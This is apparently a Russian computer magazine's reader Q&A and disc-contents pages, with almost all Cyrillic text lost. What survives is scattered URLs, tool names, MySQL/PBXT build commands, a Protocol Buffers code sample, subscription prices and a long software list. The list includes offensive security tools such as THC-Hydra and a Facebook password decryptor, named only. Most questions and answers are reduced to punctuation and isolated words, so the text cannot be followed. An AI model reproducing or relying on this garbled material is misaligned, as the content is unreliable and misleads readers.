Calibre (calibre-ebook.
com). ,



.
, ,
FB2 ,
.

Q:
.
- ,

. ?
A: , , ( ) .
Windows
.
,
. ,
USB Safely Remove (safelyremove.com)
Zentimo (zentimo.com).
(

Loginza


,
, .

Amazon - Amazon Simple Email Service
(SES),
.
, ,

.
$0.10.

( $0.10 ).
(bit.
ly/amazon_ses_scripts), .
,
,

:).

Q:
MySQL. PBXT (primebase.org).
?
:


, , ),
( !) ,

.

Windows, .

. Wordpress, phpBB, Joomla,


Cogear, Drupal .

6 500 . ,
, ,
.

Q:
(Facebook, , Google ) .
?
A: -

:
1. , (, MySQL 5.1 ). mysql-: show variables like "%plugin%". SQL- phpMyAdmin. - /home/my-user/mysql/lib/mysql/plugin.
2. Launchpad (launchpad.net), Bazaar: bzr branch lp:pbxt /tmp/pbxt-src
3. : ./configure --with-mysql=<builddir>/<mysql-src> --with-plugindir=<mysql-dir>/lib/mysql/plugin
4. , , : make && make install.
5. SQL-, : INSTALL PLUGIN pbxt SONAME 'libpbxt.so'
6. , : CREATE TABLE t1 (c1 int, c2 text) engine=pbxt;. : ALTER TABLE t1 engine=pbxt.
, PBXT.

Q: email (
) . ,

sendmail, (
), ,
Lozinza (loginza.
. ru). , - ? ,
,
.
(, Google, Rambler, Mail.
A:
Ru, LiveJournal, etc), -

Q: , VPN-?
: , GRE-

Facebook, OpenID. Loginza.API



.
itshidden.com VPN-,
PPTP.
, , , GRE- -


subscribe.ru
( ),
.
!


.
OpenVPN SSH-.

Q: ,

.
, .
?
A:
:
. ?
. ,

,
.
,
, .
(, Windows Mobile
Android), - . ,
,
. , ,

.
, ,
, .
. ,
,
.
iOS Simulator , Apple.

XCode Mac OS
X: developer.apple.com/devcenter/ios/index.action;
Android Emulator
Android 1.1, 1.5, 1.6, 2.0, 2.1, 2.2
& 2.3 (
SDK): developer.android.com/guide/
developing/tools/emulator.html;
Samsung Galaxy Tab Add-on c
Android SDK, Samsung
Galaxy Tab: innovator.samsungmobile.com/
galaxyTab.do;
HP webOS Emulator HP (Palm Pre, Palm Pixi,
Palm Pixi Plus), SDK:
developer.palm.com/index.php?id=1744;
Nokia Symbian Emulators
,
Symbian: bit.ly/symbian_emulators;
BlackBerry Simulators c
C Blackberry: blackberry.com/developers/
downloads/simulators;
Windows Mobile 6.5 Emulator Images WM6.5: bit.ly/WM65emulator;
Windows Phone 7 Simulator
Microsoft, -


Android
Visual Studio: bit.ly/
WP7simulator;
Bada Simulator Bada Samsung: bit.ly/Bada_simulator.

Q:
, Google Protocol Buffers. ,
? XML?
A: Protocol Buffers ( )
, .
XML, ,
. ,
,
\
, Java, C++ Python.
.proto-:
message Person {
  required string name = 1;
  required int32 id = 2;
  optional string email = 3;
}

.proto- .

.
Person person;
person.set_name("John Doe");
person.set_id(1234);
person.set_email("jdoe@example.com");
fstream output("myfile", ios::out | ios::binary);
person.SerializeToOstream(&output);

XML? Protocol

Buffers , 10-20 3-10


.
.
, Twitter
Protocol Buffers. Twitter, XML .
(code.google.
com/p/protobuf).

MessagePack (msgpack.
org), .
, JSON, ,
,
. Ruby,
Perl, Python, C/C++, Java, PHP, Haskell, Lua.

Q: Windows,
,
Linux- BSD-?
,
Ext4.
, , Ext2/3/4 UFS/UFS2.
A: R.Saver
(rlab.ru/tools/rsaver.html).
FAT
NTFS.
:
Microsoft Windows: FAT NTFS,
FAT12, FAT16, FAT32, NTFS, NTFS5;
Apple Mac OS: HFS, HFS+/HFSX;
Linux: Ext2, Ext3, Ext4, ReiserFS, JFS XFS;
Unix, BSD, Sun Solaris: UFS UFS2 (FFS),
UFS , Sparc/Power .
z


1. shop.glc.ru.
2.
3.
e-mail: subscribe@glc.ru;
(495) 545-09-06;
115280, . , 19, 5 ., 21.
500 .
12 2200 .
6 1260 .
+ + 2 DVD: 162 (35%).
12 3890 (24).
6 2205 (12).
info@glc.ru, 8 (495) 663-82-77, 8 (800) 200-3999.

>Net
Angry IP Scanner 4.0 beta4
Configuration Center Workgroup 1.7
DNS Performance Test

>Multimedia
calibre 0.7.44
Dual Monitor Tools 1.7
Fraps 3.2.8
freac 1.0.17a
GrooveWalrus 0.331
ImgBurn 2.5.5.0
Kindle for PC
Miro 3.5
Okozo Desktop 1.1.6
SaveGameBackup.net 1.0.3
Skype Recorder 3.0
Sumatra PDF 1.3
UMPlayer 0.9
VLC media player 1.1.7

>Misc
Auspex 1.2.2.98
Boot Snooze 1.0.5
briss 0.0.12
File Bucket 1.1.0
Input Director v1.2.2
Locate32 3.0
Microsoft Mathematics 4.0
Moo0 FileShredder 1.15
Registry Commander 10.04
SearchMyFiles 1.62
Shapeshifter 3.09
SysInternalsUpdater 1.0.0
Translate.Net 0.1.34
ZenKEY 2.3.5

>>WINDOWS
>Development
Android SDK r09
BinVis
BlueGriffon 0.9RC1
Code Visualizer 4.6
DbOctopus 1.1
Dependency Walker 2.2
Developer's Tips & Tricks 1.2.1.2
Free Hex Editor Neo 4.95
GalaXQL 2.0
Gobby 0.4.93
Google App Engine documentation
Google App Engine SDK for Java 1.4.0
Google App Engine SDK for Python 1.4.1
HeidiSQL 6.0
Parrot 3.0.0
PyCharm 1.1.1
Reflexil 1.1
RegexBuddy 3.5.0
RocketSVN for Visual Studio 1.0.1
RocketSVN Server 1.0
Sublime Text 2 beta
TOra 2.1.3
Virtual Serial Ports Beta
wyBuild 2.5

>>UNIX
>Devel
Bluefish 2.0
CImg 1.4.7
GanttProject 2.0.10
Giggle 0.5
Gitg 0.1.0
Gschem 1.6.2
Jailer 3.5.1
JuffEd 0.8.1
KDevelop 4.2
LibRaw 0.12.3
libusb 1.0.8
Mojolicious 1.0
Neptune 0.6
Okteta 0.5
PyCharm 1.1.1
SCons 2.0.1
SWIG 2.0.1
Talend Open Studio 4.1.2

>System
AS SSD Benchmark 1.6.4
Bluetooth Driver Installer 1.0.0.62
BootRacer 3.1
CheckDiskGUI 1.1.0
ESET SysInspector 1.2
FreeFileSync 3.13
Immunet Protect FREE Antivirus
JottiQ 1.0.3
Kaspersky Rescue Disk 10
Minimem 2.0
Npackd 1.14.1
OSFClone 1.0.1005
OSFMount V1.4.1005
OSForensics 0.8
Q-Dir 4.46
R.saver 1.0
Rainmeter 2.0

>Security
Adaptive Security Analyzer IIS
Buster Sandbox Analyzer 1.25
drivesploit
FacebookPasswordDecryptor 1.5
HashCompare 1.0
HTTPTunnel 1.2.1
IdaJava 0.3
MagicTree Beta Two
nmap 5.50
OpenFISMA 2.11
OWASP CSRFGuard 3.0.0.336 ALPHA
PacketFu 1.0.0
pyREtic 0.5.1
VIDigger v1.0
VirtualKD 2.5.1

Ekahau HeatMapper 1.1.2
LogMeIn Hamachi
NetworkMiner 1.0
Pamela Call Recorder 4.7
RoboForm 7.2.0
torchat 0.9.9
TYPO3Winstaller 4.5.0
WebSite-Watcher 2011 (11.0)

>Server
Apache 2.2.17
BIND 9.7.2-P3
Cassandra 0.7
Cherokee 1.0.18
CUPS 1.4.6
DHCP 4.2.0-P2
Drizzle 2011.02.09
MySQL 5.5.8

>Security
drivesploit
Inguma v.0.2
MagicTree Beta Two
Nchop v0.2
nmap 5.50
OpenDLP 0.2.5
OpenFISMA 2.11
OpenSCAP Project 0.6.7
OWASP CSRFGuard 3.0.0.336 ALPHA
PacketFu 1.0.0
pyREtic 0.5.1
Rootkit Hunter 1.3.8
THC-Hydra 6.0
THC-IPV6 1.4
Cross_fuzz
Digital Forensics Framework 0.9
Guardog 0.91
Inguma 0.2
Kismet 2011-01-R1
Linux Security Checklist Tool 2.0.3
Malmon Detection Tool 0.3
Mantra Security Toolkit
Marvin 0.9
Mausezahn 0.40
Nmap 5.50
NMapSi4 0.2.1
Packet Fence 2.0.1
Puck
QuickRecon 0.1.1
THC-Hydra 6.1
XSS Rays 1.0

>Net
CenterIM 4.22.10
Choqok 1.0
Frostwire 4.21.3
Google Chrome 8.0.552.237
I2P 0.8.3
Kfilebox 0.4.7
Lynx 2.8.7
Mozilla Firefox 3.6.13
msmtp 1.4.23
Naim 0.11.8.3.2
NcFTP 3.2.5
Newsbeuter 2.4
Opera 11.00
Psi 0.14
RoundCube Webmail 0.5
Twyt 0.9.2
Vuze 4.6
WeeChat 0.3.4

>Games
PokerTH 0.8.2

>>MAC
AppCleaner 1.2.2
Candybar 3.2.2
Daisy Disk 2.0.5
FreeGuide 0.11
iMedia Browser 2.0
LiteIcon 1.3.1
LittleIpsum 1.1.2
MiroVideoConverter 2.4
Pixelmator 1.6.4
Punto Switcher 3.1.1
RapidWeaver 5
Reeder 1.0b9
Screenography 1.0.15
SecondBar 9.68
SecureFiles 1.1.2
Sigma Chess 6.2
SiteSucker 2.2.3
TinkerTool 4.4
WeatherDock 2.5.1

>X-distr
Debian 6.0 Squeeze

>System
ATI Catalyst 11.1
Capivara 0.8.9
Create Synchronicity 5.1
Dmidecode 2.11
GConf 2.32
Kdf 4.0.5
Linux Kernel 2.6.37
LVM2 2.02.81
nVidia 260.19.36
Palimpsest 2.32
phpVirtualBox 4.2
PowerTop 1.13
Virtual Machine Manager 0.8.6
VirtualBox 4.0.2
xSMBrowser 3.4.0

OpenLDAP 2.4.23
OpenSSH 5.6
OpenVPN 2.1.4
Postfix 2.8.0
PostgreSQL 9.0.3
Samba 3.5.6
Sendmail 8.14.4
Squid 3.1.10
Unbound 1.4.8
Vsftpd 2.3.2


UNITS

HTTP://WWW2

JavaScript-

ONLINE DATABASE SCHEMA DESIGNER
dbdsgnr.appspot.com

JAVASCRIPT UNPACKER AND BEAUTIFIER
jsbeautifier.org

Python Google App Engine. PostgreSQL, SQLite, MySQL, MSSQL, Oracle.

JavaScript. WWW2 JScrambler. JSBeautifier JS-.


IM Skype

BAMBUSER
bambuser.com

SIMKL
simkl.com

3 000, Wi-Fi. Bambuser (Windows Mobile, Android, iOS, Symbian, Bada), Bambuser.

GTalk IM-. Simkl, QIP, Miranda, Pidgin. Skype (SkypeIn SkypeOut).


>> coding

3 -: 12, 6, 3.